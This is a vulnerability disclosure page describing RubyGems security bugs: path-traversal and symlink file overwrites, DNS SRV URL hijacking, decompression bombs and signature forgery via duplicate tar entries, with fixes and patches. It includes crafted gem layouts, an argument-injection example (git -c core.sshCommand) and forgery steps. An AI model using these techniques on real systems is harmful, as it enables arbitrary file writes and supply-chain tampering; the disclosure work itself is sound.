David Fifield <david@bamsoftware.com>
updated
Some security bugs in RubyGems. Nathan Malkin and I found these when we were working together in Doug Tygar's Fall 2017 CS 294-138 course on penetration testing. Our class presentation covers two of the bugs. Most of these bugs were fixed in RubyGems 2.7.6.
It's a little hard to define what counts as a "bug"
in a program like RubyGems, whose whole purpose is to
download code and execute it.
Even just gem install
can
run arbitrary malicious code
through extconf.rb. (See also.)
We therefore looked for things that were unambiguously
unexpected: for example even a malicious gem
should be safe to simply inspect, as long as you don't try to install or run it.
Here are some leads that we didn't fully pursue. They may give you some ideas if you're looking for new bugs.
RubyGems has
some kind of support
for downloading gems via Git.
However, the functionality doesn't appear to be exposed at all(?)—it
seems to need
an extension
to make it work.
But Bundler,
which is somehow integrated with RubyGems,
allows downloading from Git repositories,
and it has problems with command line sanitization.
For example, try providing --help
where Bundler expects a URL:
$ echo "gem 'rack', :git => '--help'" > Gemfile
$ bundler install
Fetching --help
error: unknown option `bare'
usage: git help [--all] [--guides] [--man | --web | --info] [<command>]
    -a, --all             print all available commands
    -g, --guides          print list of useful guides
    -m, --man             show man page
    -w, --web             show manual in web browser
    -i, --info            show info page
Retrying `git clone '--help' "/home/user/.bundle/cache/git/--help-9a8265a5ba2c33881e2717e7581df323a5188174" \
    --bare --no-hardlinks --quiet` due to error (2/4): \
    Bundler::Source::Git::GitCommandError Git error: command \
    `git clone '--help' "/home/user/.bundle/cache/git/--help-9a8265a5ba2c33881e2717e7581df323a5188174" \
    --bare --no-hardlinks --quiet` in directory /home/user/test/git has failed.
error: unknown option `bare'
We couldn't find a way to get command execution.
A promising direction is setting a configuration option,
some of which control command execution,
using the
-c
option.
For example,
$ git clone -ccore.sshCommand=date 'ssh://localhost/foo'
Cloning into 'foo'...
/bin/date: extra operand ‘git-upload-pack '/foo'’
Try '/bin/date --help' for more information.
fatal: Could not read from remote repository.
RubyGems deals with lots of gzip-compressed data.
In some contexts, it handles decompression in a streaming manner,
using Zlib::GzipReader
;
but in others, it tries to decompress completely in memory,
using Zlib::Inflate
.
This potentially makes it vulnerable to
decompression bombs.
bomb.rb outputs some highly compressed
gem files.
$ ulimit -v 1000000
$ ruby bomb.rb
$ ls -lgoh bomb-10000000000.gem
-rw-r--r-- 1 9.3M Nov 13 2017 bomb-10000000000.gem
$ gem spec bomb-10000000000.gem
/usr/lib/ruby/2.3.0/rubygems/package.rb:445:in `read': failed to allocate memory (NoMemoryError)
I tried running my own copy of the rubygems.org code, and uploading such a highly compressed gem to it. There seemed to be some kind of memory or CPU time limiter running by default, though, so it didn't seem to actually do any harm.
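One way to blunt a decompression bomb is to inflate in a streaming manner and give up once a size cap is exceeded. The following is a minimal sketch, not RubyGems code: `bounded_gunzip`, `make_bomb`, `OutputTooLarge`, `MAX_OUTPUT`, and the 64 KiB chunk size are all hypothetical names and values chosen for illustration.

```ruby
require 'zlib'
require 'stringio'

# Hypothetical cap on decompressed size; choose a value suited to the data.
MAX_OUTPUT = 10 * 1024 * 1024

class OutputTooLarge < StandardError; end

# Decompress gzip data from io in fixed-size chunks, raising as soon as the
# output exceeds limit, instead of inflating everything into memory first.
def bounded_gunzip(io, limit = MAX_OUTPUT)
  out = String.new
  gz = Zlib::GzipReader.new(io)
  begin
    # GzipReader#read(len) returns nil at end of stream.
    while (chunk = gz.read(64 * 1024))
      out << chunk
      raise OutputTooLarge, "more than #{limit} bytes" if out.bytesize > limit
    end
  ensure
    gz.close
  end
  out
end

# Build a small test "bomb": a long run of zero bytes compresses extremely well.
def make_bomb(size)
  buf = StringIO.new
  gz = Zlib::GzipWriter.new(buf)
  gz.write("\0" * size)
  gz.finish
  buf.string
end
```

With this sketch, `bounded_gunzip(StringIO.new(make_bomb(1_000_000)), 100_000)` raises `OutputTooLarge` after buffering only a little more than the cap, whereas a one-shot inflate would allocate the full output.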
Gem metadata is usually stored as YAML in the file metadata.gz inside the gem tar container. But after being installed, a subset of the metadata is redundantly stored in a stub specification, a formatted comment at the top of the specifications/*.gemspec YAML file. Its purpose (I think) is to be faster to parse than the entire gemspec, for common operations where only part of the metadata is needed. Of course having two sources for the same data carries the risk that they will get out of sync. A stub specification looks like this:
# stub: tzinfo 1.2.3 ruby lib
The four parts are, in order: name, version, platform, and require_path.
The parts are parsed by splitting on whitespace.
A strange thing happens if a gem file happens to have a version number that is an empty string (as in #270068 below): the stub will look like this:
# stub: tzinfo ruby lib
Because the stub is parsed by splitting on whitespace,
this gets misparsed as version="ruby"
, platform="lib"
.
This bug led to a crash
in all gem
commands, once a single stub with an empty
version had been installed.
The fix for the crash, though, is clearly wrong.
Here is the pre-fix code, in pseudocode:
parts = stub.split(" ")
name = parts[0]
version = parts[1]
platform = parts[2]
require_path = parts.last
The fix changes it to this:
parts = stub.split(" ")
name = parts[0]
if parts[1] parses as a version number:
    version = parts[1]
else:
    version = "0"
platform = parts[2] # BUG
require_path = parts.last
They didn't shift the following assignment to account for the missing version number. It should rather be:
parts = stub.split(" ")
name = parts[0]
if parts[1] parses as a version number:
    version = parts[1]
    platform = parts[2]
    require_path = parts.last
else:
    version = "0"
    platform = parts[1]
    require_path = parts.last
The upshot is that platform ends up set to an attacker-controllable string
(the value that should have been treated as require_path),
which differs from what's stored in the YAML.
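To make the misparse concrete, here is a small Ruby model of the two pseudocode variants above. It is a sketch only: `Stub`, `version?`, `parse_stub_as_fixed`, and `parse_stub_shifted` are hypothetical names, and the version regular expression is a rough stand-in for whatever check RubyGems actually applies.

```ruby
# Simplified model of the stub-line parser; the real RubyGems code differs.
Stub = Struct.new(:name, :version, :platform, :require_path)

# Rough stand-in for "parses as a version number" (an assumption).
def version?(s)
  !s.nil? && s.match?(/\A\d+(\.[0-9A-Za-z]+)*\z/)
end

# Behavior described for the shipped fix: fall back to "0" for the version
# but keep reading platform from parts[2].
def parse_stub_as_fixed(line)
  parts = line.sub(/\A# stub: /, '').split(' ')
  version = version?(parts[1]) ? parts[1] : '0'
  Stub.new(parts[0], version, parts[2], parts.last)
end

# Corrected variant: when the version is missing, later fields shift left.
def parse_stub_shifted(line)
  parts = line.sub(/\A# stub: /, '').split(' ')
  if version?(parts[1])
    Stub.new(parts[0], parts[1], parts[2], parts.last)
  else
    Stub.new(parts[0], '0', parts[1], parts.last)
  end
end

line = '# stub: tzinfo  ruby lib' # an empty version leaves a double space
p parse_stub_as_fixed(line).platform # "lib", which is really the require_path
p parse_stub_shifted(line).platform  # "ruby"
```

Both variants agree on a well-formed stub such as `# stub: tzinfo 1.2.3 ruby lib`; they only diverge when the version field is missing.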
Users at rubygems.org are identified by both a numeric user ID and a username. For example, both of these point to the same user:
The only thing separating user IDs and usernames is their syntax: user IDs must start with a digit, and usernames must not. Throughout the code, both forms of identification are mostly interchangeable, returning results if either the user ID or the username matches. If you could subvert the username checks, and create an account with a numeric username, it would be interpreted on the server as a user ID, and you could probably gain the privileges of another user.
Update: whatever vulnerabilities may have existed with SRV lookups disappeared when SRV lookups were removed in October 2018. See RubyGems news. It turns out that file URLs were vulnerable.
The gem
command issues a DNS SRV query,
the response to which may override the URL from which
gems are downloaded.
The dodginess of the feature and the fragility of its verification
are described more here.
I could not find a serious, plausible vulnerability
in the code with respect to http or https URLs,
partly because the overridden host component
has to be a subdomain of the original domain.
But gem
also supports s3 URLs and with those
I made more progress.
The observations in this section are based on the code as of commit 7a49f405dd.
A user who has configured an s3 source
probably has configured their .gemrc
like this:
# https://github.com/rubygems/rubygems/pull/1134
:sources:
- s3://mybucket/
s3_source: {
  mybucket: {
    id: "my_id",
    secret: "my_secret"
  }
}
With such a configuration,
gems will not be fetched from the default
https://rubygems.org/gems/,
but from
https://mybucket.s3.amazonaws.com/gems/.
The funny thing is, gem
will do the DNS SRV
thing even when using an s3 source.
Instead of
_rubygems._tcp.rubygems.org,
the DNS SRV query will be for
_rubygems._tcp.mybucket.
Suppose the response is not.mybucket
:
it passes the subdomain check,
and the constructed URL will be
https://not.mybucket.s3.amazonaws.com/gems/.
The not.mybucket bucket
may be owned by a completely different user (i.e., an attacker)
than the expected mybucket bucket.
On its own, this doesn't work, because there are no credentials
for not.mybucket in .gemrc
(the error message is "no key for host not.mybucket in s3_source in .gemrc").
We can work around that by providing the credentials in the URL:
the DNS SRV response should be
attackerusername:attackerpassword@not.mybucket
.
This is so, so close to being a working exploit.
There's just one problem:
the wildcard certificate for *.s3.amazonaws.com
doesn't match the double subdomain.
If you try it, gem
fails with the error
"SSL_connect returned=1 errno=0 state=error: certificate verify failed (certificate rejected)".
I tried also setting :ssl_verify_mode: 0
in .gemrc
,
but that doesn't seem to affect this particular request.
The AWS documentation
says that bucket names containing a dot don't work with HTTPS:
"When using virtual hosted–style buckets with SSL, the SSL wild card certificate only matches buckets that do not contain periods."
But that's really the only thing preventing hijacking of s3 fetches.
If gem
were ever modified to use the alternative
style of URL,
https://s3.amazonaws.com/mybucket/gems/,
it would become vulnerable.
I suspect that a sufficient fix for this is to disable the DNS SRV thing for s3 sources. s3 bucket names don't have the same ownership relationship as subdomains.
This is a fairly weak vulnerability, a limited file overwrite. It takes advantage of the code incorrectly using string prefix comparison to determine subdirectory containment. If you can convince someone to install a gem file whose name is a prefix of some other important gem file, you can overwrite that other important gem file. This vulnerability was assigned CVE-2018-1000079. It is reminiscent of, but weaker than, report #243156 by Yusuke Endoh, which could overwrite any gem file regardless of name.
There's a small bug in the report: it says that deleting an existing gem could lead to code execution. The other two things could lead to code execution, but just deleting a gem would not.
The fix
f83f911e19
went into RubyGems 2.7.6.
It just appends a '/'
before doing the string
prefix check, as we suggested.
(Maybe it would have been better to use
File::SEPARATOR
instead?)
The install_location
function allows writing to certain files
outside the installation directory.
The install_location
function in
lib/rubygems/package.rb attempts to ensure that files are not installed outside
destination_dir
.
However the test it employs, a string comparison using
start_with?
, fails to prevent the case when
destination_dir
is a prefix of the path being written.
Example that should be prevented but is allowed:
install_location '../install-whatever-foobar/hello.txt', '/tmp/install'
# outputs '/tmp/install-whatever-foobar/hello.txt'
gem install
always constructs
destination_dir
as
'#{name}-#{version}'
,
so the vulnerability cannot overwrite arbitrary files.
However, a malicious gem with name='rails'
and an empty version number (version=''
),
for example, could overwrite the files of any other gem whose name begins with
rails-
, like rails-i18n or rails-letsencrypt.
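The difference between a string-prefix test and a real containment test can be shown in a few lines of Ruby. This is a model of the check, not the RubyGems source; `inside_naive?` and `inside_strict?` are hypothetical names, and the `/tmp/install/gems` layout is assumed for illustration.

```ruby
# String-prefix containment test, in the spirit of the vulnerable check.
def inside_naive?(destination, destination_dir)
  File.expand_path(destination).start_with?(destination_dir)
end

# Same test with a directory separator appended to the prefix.
def inside_strict?(destination, destination_dir)
  File.expand_path(destination).start_with?(destination_dir + '/')
end

# name='rails' and version='' give a directory named "rails-".
dir = '/tmp/install/gems/rails-'
victim = File.join(dir, '../rails-i18n-5.0.4/lib/rails_i18n.rb')
own = File.join(dir, 'README')

p inside_naive?(victim, dir)  # true: "rails-" is a prefix of "rails-i18n-5.0.4"
p inside_strict?(victim, dir) # false
p inside_strict?(own, dir)    # true: the gem's own files are still allowed
```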
The attached ra.gem demonstrates the vulnerability. It assumes that some other gems have already been installed.
gem install --install-dir=/tmp/install rails-i18n rails-letsencrypt rails-html-sanitizer
gem install --install-dir=/tmp/install ra.gem
The malicious gem will do three things, each of which could potentially lead to code execution:
The structure of the gem file reveals how the attack works:
$ tar -xvf ra.gem
metadata.gz
data.tar.gz
$ gzip -dc metadata.gz | head -n 4
--- !ruby/object:Gem::Specification
name: rails
version: !ruby/object:Gem::Version
  version: ''
$ tar -tvf data.tar.gz
-rw-r--r-- 0/0 12 1969-12-31 16:00 README
drwxr-xr-x 0/0 0 1969-12-31 16:00 ../rails-letsencrypt-0.5.3/
-rw-r--r-- 0/0 12 1969-12-31 16:00 ../rails-i18n-5.0.4/lib/rails_i18n.rb
lrw-r--r-- 0/0 0 1969-12-31 16:00 ../rails-html-sanitizer-1.0.3 -> /tmp/attacker-controlled
A sufficient fix is to append a directory separator to
destination_dir
before doing the start_with?
check.
diff --git a/lib/rubygems/package.rb b/lib/rubygems/package.rb
index c36e71d8..f73f9d30 100644
--- a/lib/rubygems/package.rb
+++ b/lib/rubygems/package.rb
@@ -424,7 +424,7 @@ EOM
     destination = File.expand_path destination
 
     raise Gem::Package::PathError.new(destination, destination_dir) unless
-      destination.start_with? destination_dir
+      destination.start_with? destination_dir + '/'
 
     destination.untaint
     destination
ra.gem, an example of a vulnerable gem
make-ra-gem.py, sample code that generates the proof of concept (to run: ./make-ra-gem.py > ra.gem)
0001-Add-test_install_location_suffix.patch, test code that checks for this vulnerability. Run with ruby -I"lib:test" test/rubygems/test_gem_package.rb.
Using a symbolic link that points outside of the
install directory, a gem could overwrite any named file
with arbitrary contents.
It's simple to execute but powerful:
it allows overwriting arbitrary files as root.
But then again, if you can convince someone
to install any malicious gem file,
you can get root trivially, no symlink tricks required.
So what makes this vulnerability special?
Just that it affects even gem unpack
—even
trying to inspect the gem file is dangerous,
even if you don't install or run it.
This vulnerability was assigned
CVE-2018-1000073.
It turns out GNU tar had this exact same bug way back in 1998 (CVE-2002-1216):
tar "features" from Willy Tarreau
lrwxrwxrwx willy/users 0 Sep 21 11:34 1998 include -> /etc
-rw-r--r-- willy/users 758 Sep 21 11:40 1998 include/profile
The commits
1b931fc03b and
666ef793ca,
part of RubyGems 2.7.6,
attempt to fix this vulnerability.
If you ask me, the fix is unsatisfying.
It uses File::realpath
, just like the old code,
which is good as far as it goes,
but for old versions of Ruby without realpath
it just silently falls back to the old vulnerable code.
They also use string operations
(start_with?
)
to try and determine subdirectory containment,
which is exactly what led to #270068.
There may still be vulnerabilities here.
The RubyGems installer attempts to prevent a gem from writing any files outside the install directory; however it is possible to bypass the check with a symbolic link in a crafted gem.
$ tar -xvf symlink.gem
metadata.gz
data.tar.gz
$ tar -tvf data.tar.gz
-rw-r--r-- 0/0 12 1969-12-31 16:00 README
lrw-r--r-- 0/0 0 1969-12-31 16:00 link -> /tmp
-rw-r--r-- 0/0 6 1969-12-31 16:00 link/HACKED
Using the attached symlink.gem
:
gem install symlink.gem
# or
gem unpack symlink.gem
This will create a file /tmp/HACKED.
The name and contents of the written file, as well as the file permissions, are arbitrary.
Using this technique, an attacker could easily get code execution, for example by overwriting a system binary or writing into a user's .profile
.
Note that the exploit will even work with gem unpack, which is supposed to be free of system-level side effects.
For comparison, this exploit is more powerful than #243156 (and #270068) as the target directory doesn't need to contain a dash.
The code in
install_location
is supposed to check if the target filename is outside the destination directory.
It does this by fully resolving (using File.realpath) the destination directory and then seeing if the target filename starts with that resolved path.
This test succeeds for a symlink that points outside the gem's install directory, because its "destination directory" is the directory where it's located (not where it points), which is local.
The test also succeeds for a file that uses the symlink to "escape" the local directory, because the symlink really is its prefix.
However, in combination, these files can allow for arbitrary writes, as shown.
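The combination can be reproduced safely in a temporary directory. The sketch below is a simplified model rather than the RubyGems check itself: `lexically_inside?` and `really_inside?` are hypothetical helpers, and the second is only one possible stricter test (resolving symlinks in the parent directory before comparing).

```ruby
require 'tmpdir'
require 'fileutils'

# Lexical check: expand the path textually and compare prefixes.
# Symlinks along the way are not followed.
def lexically_inside?(path, dir)
  File.expand_path(path).start_with?(dir + '/')
end

# Stricter check: resolve symlinks in the parent directory first.
def really_inside?(path, dir)
  parent = File.realpath(File.dirname(path))
  (parent + '/').start_with?(File.realpath(dir) + '/')
end

results = Dir.mktmpdir do |root|
  outside = File.join(root, 'outside')
  dest = File.join(root, 'dest')
  FileUtils.mkdir_p([outside, dest])

  # Entry 1: a symlink located inside dest that points outside it.
  File.symlink(outside, File.join(dest, 'link'))
  # Entry 2: a file whose path passes through that symlink.
  target = File.join(dest, 'link', 'HACKED')

  [lexically_inside?(target, dest), really_inside?(target, dest)]
end

p results # [true, false]: the path text looks local, but it resolves outside
```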
The root cause vulnerability is the ability of symlinks to point outside the gem. This was actually forbidden in a commit from 2015, but was made more permissive in a later commit, creating this vulnerability.
The course of action we recommend is to (again) disallow symlinks that point outside the gem directory.
symlink.gem, an example of a vulnerable gem. Note: extract this using tar instead of gem to avoid triggering the vulnerability (e.g., tar -Oxf symlink.gem data.tar.gz | tar -tzvf -)
make-symlink-gem.py, sample code that generates the proof of concept (to run: ./make-symlink-gem.py > symlink.gem)
0001-Add-a-test-test_extract_symlink_parent.patch, test code that can be added to RubyGems to test for this vulnerability
api_endpoint allows URI syntax in DNS SRV response
Update: RubyGems removed SRV lookups in October 2018, removing this class of vulnerability. See RubyGems news. This bug report was about http and https URLs; see also the impact on s3 URLs and file URLs.
RubyGems has had a funny and little-known
feature of making a DNS SRV request
to find an alternate download server
other than the default api.rubygems.org.
As you might expect,
seeing as a local attacker can spoof SRV responses,
such a feature is hard to make secure.
Despite past vulnerabilities and resultant additional security checks,
we found new ways to mess with the address
that a client connects to,
though none that obviously leads to code execution.
The relevant piece of code has a long history of security vulnerabilities:
URI.parse "#{res.target}#{uri.path}"
Adds the feature to do a SRV lookup to check for an alternative API hostname. The stated rationale is that the feature "allows for the usage of short, simple source names (like https://rubygems.org) with specific api endpoint names, which improves load balancing." There are no security checks in this version: anyone who can spoof a SRV response can get you to download gems from their chosen location. The feature first appears in RubyGems 2.0.
target = res.target.to_s.strip
if /#{host}\z/ =~ target
  return URI.parse "#{uri.scheme}://#{target}#{uri.path}"
end
Jonathan Claudius
reports
(HackerOne)
the DNS spoofing vulnerability, which becomes
CVE-2015-3900.
The intended fix was that the DNS reply should be restricted
to being a subdomain of the original requested domain; e.g.
"rubygems.org" is allowed to become "api.rubygems.org",
but not to become "evil.hacker.example".
The first attempt
at a fix used a regular expression,
/#{host}\z/
, to try to ensure that the
SRV response ends with the original hostname.
This change went into
RubyGems 2.4.7.
target = res.target.to_s.strip
if /\.#{Regexp.quote(host)}\z/ =~ target
  return URI.parse "#{uri.scheme}://#{target}#{uri.path}"
end
But the regular expression fix was incomplete:
not only did it allow "rubygems.org"
to become "evilrubygems.org",
it also allowed an attacker to control
regular expression metacharacters and therefore
match almost anything.
This was CVE-2015-4020.
A followup fix
changed the regular expression to /\.#{Regexp.quote(host)}\z/
,
which ensures that there's a dot before the domain,
and escapes metacharacters.
This further fix went into
RubyGems 2.4.8
in June 2015.
However, the code remained vulnerable
to a slightly modified attack.
target = res.target.to_s.strip
if URI("http://" + target).host.end_with?(".#{host}")
  return URI.parse "#{uri.scheme}://#{target}#{uri.path}"
end
Jonathan Claudius
reported a problem
with the regular expression fix.
The regular expression /\.#{Regexp.quote(host)}\z/
is fine for making sure that a hostname ends with a dot and then host
.
But the problem was that the string was not treated purely as a hostname;
it was pasted into the middle of a string that was then
parsed as a URL.
An attacker could return a string like
"evil.hacker.example/api.rubygems.org",
which would pass the check because it ends in
".rubygems.org",
but would be parsed into the URL
"https://evil.hacker.example/api.rubygems.org".
This vulnerability was
CVE-2017-0902.
The developers' reaction was to take the SRV response, parse it as a URL, extract the host component, and compare that against the expected host. The fix shipped four months later in RubyGems 2.6.13. (It was while looking at this particular fix, and the others in 2.6.13, that I realized there were likely more bugs lurking in RubyGems.)
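The three generations of the check can be compared side by side by reducing each to a predicate on the SRV target. This is an illustrative sketch: `HOST`, `CHECKS`, and `TARGETS` are hypothetical names, and the predicates only reproduce the conditions quoted in the snippets above, not the surrounding RubyGems code.

```ruby
require 'uri'

HOST = 'rubygems.org'

# Each check is the condition from one version of the code.
CHECKS = {
  'unquoted regexp (2.4.7)' => ->(t) { !!(/#{HOST}\z/ =~ t) },
  'quoted regexp (2.4.8)' => ->(t) { !!(/\.#{Regexp.quote(HOST)}\z/ =~ t) },
  'parsed host (2.6.13)' => ->(t) { URI('http://' + t).host.end_with?(".#{HOST}") },
}

TARGETS = [
  'api.rubygems.org',                     # legitimate subdomain
  'evilrubygems.org',                     # the CVE-2015-4020 case
  'evil.hacker.example/api.rubygems.org', # the CVE-2017-0902 case
]

CHECKS.each do |name, check|
  accepted = TARGETS.select { |t| check.call(t) }
  puts "#{name}: accepts #{accepted.inspect}"
end
```

The first check accepts all three targets, the second rejects only evilrubygems.org, and the third accepts only api.rubygems.org.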
Here is the message I sent to security@rubygems.org:
I was looking at commit
8d91516fb7037ecfb27622f605dc40245e0f8d32,
which
was the fix for the DNS hijacking issue
CVE-2017-0902.
The function
still handles the DNS response in a potentially unsafe way. I did not
find any actual vulnerabilities in the current code; the code that uses
the result of api_endpoint
(perhaps coincidentally) discards the
potentially malicious components of the URI that api_endpoint
returns.
But future code may be vulnerable. I'm sending this to the security list
because my checks for vulnerability may be incomplete.
The problem is that api_endpoint
allows the DNS SRV response to contain
URI-like syntax (which was the cause of CVE-2017-0902). The fix was to
parse the syntax as if it were a URI, extract the host component, and
only do a comparison using the host component, rather than the entire
string. However, the entire string is still pasted into the return
value, assuming the comparison succeeds. It can contain URI syntax
characters like ?
and #
that change the interpretation of what
follows them.
I'm attaching a patch that adds a new test and changes api_endpoint
to
discard everything but the host after parsing the DNS SRV response as a
URI. It would probably be even better simply to disallow any syntax
other than hostname literals.
The lines that I initially thought were vulnerable, but appear not to be, are in lib/rubygems/source.rb:
bundler_api_uri = api_uri + './api/v1/dependencies'
uri = api_uri + "#{Gem::MARSHAL_SPEC_DIR}#{spec_file_name}"
spec_path = api_uri + "#{file_name}.gz"
The reason they are not vulnerable is that api_uri
is a
URI
object
rather than a string, so the
+
operator is actually the
merge
method
rather than string concatenation. The merge
operator replaces any
existing path
, query
, and fragment
components, it seems.
(It would not help if the attacker-provided string changed the URI's
host
, pass
, or
port
components, but I could not think of a realistic path to
exploitation using only those components.) However if api_uri
had been
coerced into a string, then the code would be vulnerable. An attacker
could cause the client to download some other path, which could possibly
lead to a downgrade attack or replacing one gem with another.
Here is the commit log for the included patch, which was lost when the report got turned into a pull request.
The api_endpoint
function inserts an untrusted string into the middle of a URI:
URI.parse "#{uri.scheme}://#{target}#{uri.path}"
The intention is that target
only replaces the host component of the URI;
for example if uri.scheme = "https"
and uri.path = "/path"
,
and target = "example.com"
, then the result will be
https://example.com/path
But target
could contain other URI syntax that masks
uri.path
. For example, if target = "example.com/badpath?query="
,
then the result will be
https://example.com/badpath?query=/path
If target = "example.com/badpath#fragment"
, then the result will be
https://example.com/badpath#fragment/path
Additionally, target = "example.com:9999"
could change the port:
https://example.com:9999/path
or target = "user:pass@example.com"
could change credentials:
https://user:pass@example.com/path
Returning a URI with an attacker-controlled path/query/fragment
is potentially dangerous if used directly
or if other URIs are created from it using string concatenation.
For example, if api_endpoint
returns "https://example.com/malicious.gz#"
,
and some other code tries to create a new URI by appending
"/good.gz"
, then the resulting URI will be https://example.com/malicious.gz#/good.gz
,
with the intended path being hidden in the fragment component of the URI.
However, I did not find any places in the code where this happens;
code that on first glance looks vulnerable:
spec_path = api_uri + "#{file_name}.gz"
is actually safe because the
+
is not string concatenation,
but the
merge
method of
URI::Generic
.
It is still possible to replace the user, password, and port,
but those do not offer an obvious path to exploitation.
Probably it's better not to parse target
as a URI at all;
rather to insist that it have the form of a hostname only.
Commit
8d91516fb7037ecfb27622f605dc40245e0f8d32
began parsing target
as a URI in order to compare the host component as a fix for
CVE-2017-0902;
however it does not discard components other than the host when building the result.
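The examples in the commit log can be checked with Ruby's URI library. In this sketch, `build` mirrors the interpolation shown above with fixed scheme and path, and `build_host_only` is a hypothetical variant that keeps only the host component of the parsed target, along the lines the patch describes; neither is the RubyGems code itself.

```ruby
require 'uri'

# Mirrors the interpolation in api_endpoint, with example scheme and path.
def build(target, scheme: 'https', path: '/path')
  URI.parse "#{scheme}://#{target}#{path}"
end

# Hypothetical repair: parse the target, then discard all but the host.
def build_host_only(target, scheme: 'https', path: '/path')
  host = URI('http://' + target).host
  URI.parse "#{scheme}://#{host}#{path}"
end

u = build('example.com/badpath?query=')
p [u.host, u.path, u.query] # ["example.com", "/badpath", "query=/path"]

u = build('user:pass@example.com:9999')
p [u.userinfo, u.host, u.port] # ["user:pass", "example.com", 9999]

puts build_host_only('example.com/badpath?query=') # https://example.com/path

# URI#+ is merge, so the appended path replaces path, query, and fragment.
raw = 'https://example.com/malicious.gz#'
merged = URI.parse(raw) + '/good.gz'
puts merged # https://example.com/good.gz

# Plain string concatenation instead hides the intended path in the fragment.
concatenated = URI.parse(raw + '/good.gz')
p [concatenated.path, concatenated.fragment] # ["/malicious.gz", "/good.gz"]
```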
RubyGems supports developer signatures on gem files. Signatures for the various components of a gem are stored alongside them, directly inside the gem tar container. Ambiguous processing of multiple tar entries with the same filename enabled transferring any existing legitimate signature onto arbitrary contents.
It turns out that, in practice, essentially no developers actually sign their gems. A minor challenge in preparing the report was finding a gem—any gem—with a valid and current signature. Even if developers signed their gems, the default client behavior is not to verify signatures.
The fix f5042b8792 went into RubyGems 2.7.6. All it does is disallow duplicate filenames in a tar file, which seems to be sufficient. For some reason they didn't take our patch that adds tests. The fix is only partial: while it's no longer possible to attach someone else's signature to your own contents, you can still mix and match signed data and metadata files.
This vulnerability was assigned CVE-2018-1000076. Our report got us a $1000 bounty.
Inconsistencies in how gem
processes gem files make it possible to reuse a signature from an existing signed gem and apply it to arbitrary contents. The forged gem will install even with -P HighSecurity
.
The attached file multi_json-1.12.2.gem is a forged version of the genuine multi_json-1.12.2.gem gem with faked contents (just a single text file called HACKED). Here is how to check it. You must first trust the original developer's public key.
$ gem --version
2.5.2
$ wget https://raw.githubusercontent.com/intridea/multi_json/master/certs/rwz.pem
$ gem cert --add rwz.pem
Added '/CN=pavel/DC=pravosud/DC=com'
$ gem install --install-dir install -P HighSecurity multi_json-1.12.2.gem
Successfully installed multi_json-1.12.2
1 gem installed
$ ls install/gems/multi_json-1.12.2/
HACKED
The vulnerability stems from inconsistencies in how gem
interprets the entries of the tar container.
A tar file may contain multiple entries with the same name.
When there are two data.tar.gz entries, for example, gem
will honor the second one when verifying the signature,
but the first one when installing files.
The proof of concept gem uses this trick:
it prepends an additional data.tar.gz entry to the genuine multi_json-1.12.2.gem.
(The attached forge-gem.sh script was used to make it.)
$ tar tvf multi_json-1.12.2.gem
-r--r--r-- wheel/wheel 163 2017-10-05 16:05 data.tar.gz
-r--r--r-- wheel/wheel 1840 2017-09-04 21:51 metadata.gz
-r--r--r-- wheel/wheel 256 2017-09-04 21:51 metadata.gz.sig
-r--r--r-- wheel/wheel 16908 2017-09-04 21:51 data.tar.gz
-r--r--r-- wheel/wheel 256 2017-09-04 21:51 data.tar.gz.sig
-r--r--r-- wheel/wheel 270 2017-09-04 21:51 checksums.yaml.gz
-r--r--r-- wheel/wheel 256 2017-09-04 21:51 checksums.yaml.gz.sig
A similar bug affects checksums.yaml.gz: checksums are read from the first such entry, while the signature is verified on the last. This table summarizes the inconsistencies:
file | extract_files uses | verify uses |
---|---|---|
data.tar.gz | first | last |
checksums.yaml.gz | first | last |
metadata.gz | last | last |
Here are the pieces of code that are responsible for the inconsistencies in processing.
extract_files
takes the first data.tar.gz entry:
def extract_files destination_dir, pattern = "*"
  verify unless @spec
  FileUtils.mkdir_p destination_dir
  @gem.with_read_io do |io|
    reader = Gem::Package::TarReader.new io
    reader.each do |entry|
      next unless entry.full_name == 'data.tar.gz'
      extract_tar_gz entry, destination_dir, pattern
      return # ignore further entries
    end
  end
end
read_checksums
seeks
to the first checksums.yaml.gz entry:
def read_checksums gem
  Gem.load_yaml
  @checksums = gem.seek 'checksums.yaml.gz' do |entry|
    Zlib::GzipReader.wrap entry do |gz_io|
      YAML.load gz_io.read
    end
  end
end
verify_files
and
verify_entry
iterate over all entries in the tar file, filling in
@signatures
and @digests
.
In the case of entries with duplicate names, it overwrites previous values,
meaning that the last result wins.
verify_entry
also handles metadata.gz, calling
load_spec
afresh each time:
def verify_entry entry
  file_name = entry.full_name
  @files << file_name
  case file_name
  when /\.sig$/ then
    @signatures[$`] = entry.read if @security_policy
    return
  else
    digest entry
  end
  case file_name
  when /^metadata(.gz)?$/ then
    load_spec entry
  when 'data.tar.gz' then
    verify_gz entry
  end
rescue => e
  message = "package is corrupt, exception while verifying: " +
            "#{e.message} (#{e.class})"
  raise Gem::Package::FormatError.new message, @gem
end
verify_checksums
and
verify_signatures
operate only on the precomputed
@checksums
, @signatures
, and @digests
.
Incidentally,
get_metadata
,
used by the unpack
command, has its own extractor for metadata.gz,
but it happens to grab the last entry, just like verify_files
.
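The first-versus-last inconsistency is easy to model without any tar handling. In the sketch below, the container is just an ordered list of name and contents pairs; `first_entry`, `last_entry`, and `reject_duplicates!` are hypothetical helpers that imitate, respectively, the early return in extract_files, the hash overwriting in verify_entry, and a duplicate-rejecting policy.

```ruby
# Like extract_files: stop at the first matching entry.
def first_entry(entries, name)
  entries.find { |n, _| n == name }&.last
end

# Like verify_entry filling a hash: later duplicates overwrite earlier ones.
def last_entry(entries, name)
  seen = {}
  entries.each { |n, contents| seen[n] = contents }
  seen[name]
end

# One possible mitigation: refuse containers with duplicate names.
def reject_duplicates!(entries)
  names = entries.map(&:first)
  dup = names.find { |n| names.count(n) > 1 }
  raise ArgumentError, "duplicate entry: #{dup}" if dup
  entries
end

# A forged container: the attacker's data.tar.gz is prepended.
entries = [
  ['data.tar.gz', 'attacker payload'],
  ['metadata.gz', 'genuine metadata'],
  ['data.tar.gz', 'genuine payload'],
  ['data.tar.gz.sig', 'signature over genuine payload'],
]

p first_entry(entries, 'data.tar.gz') # "attacker payload" (what gets installed)
p last_entry(entries, 'data.tar.gz')  # "genuine payload" (what gets verified)
```

Calling `reject_duplicates!(entries)` on this list raises `ArgumentError`, which is the kind of behavior a duplicate-rejecting policy would give.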
The attached patch 0001-Add-tests-that-Gem-Package-verify-checks-duplicate-f.patch adds two new tests (both currently failing) that check signature verification when bogus files come before or after the genuine files.
